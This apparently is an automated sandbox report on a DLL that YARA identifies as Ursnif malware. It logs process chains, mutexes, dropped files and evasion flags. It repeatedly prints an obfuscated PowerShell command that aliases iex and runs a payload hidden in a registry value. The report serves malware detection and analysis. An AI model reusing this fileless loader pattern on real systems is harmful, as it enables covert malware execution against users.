            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
            Source: classification engineClassification label: mal100.troj.evad.winDLL@59/52@16/4
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_00F13309
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
            Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 6.dllStatic file information: File size 1781920 > 1048576
            Source: 6.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B073 push ecx; ret 4_2_00F1B083
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1E97E pushad ; iretd 4_2_00F1E982
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1AD40 push ecx; ret 4_2_00F1AD49
            Source: 6.dllStatic PE information: real checksum: 0x1ba6ec should be: 0x1b8278
            Source: nigogz4l.dll.33.drStatic PE information: real checksum: 0x0 should be: 0xee8b
            Source: dtnsoflb.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x4b02
            Source: nlbomp32.dll.35.drStatic PE information: real checksum: 0x0 should be: 0xf45d
            Source: uu5u2nmv.dll.40.drStatic PE information: real checksum: 0x0 should be: 0xa363
            Source: wklr4juq.dll.36.drStatic PE information: real checksum: 0x0 should be: 0x1029d
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
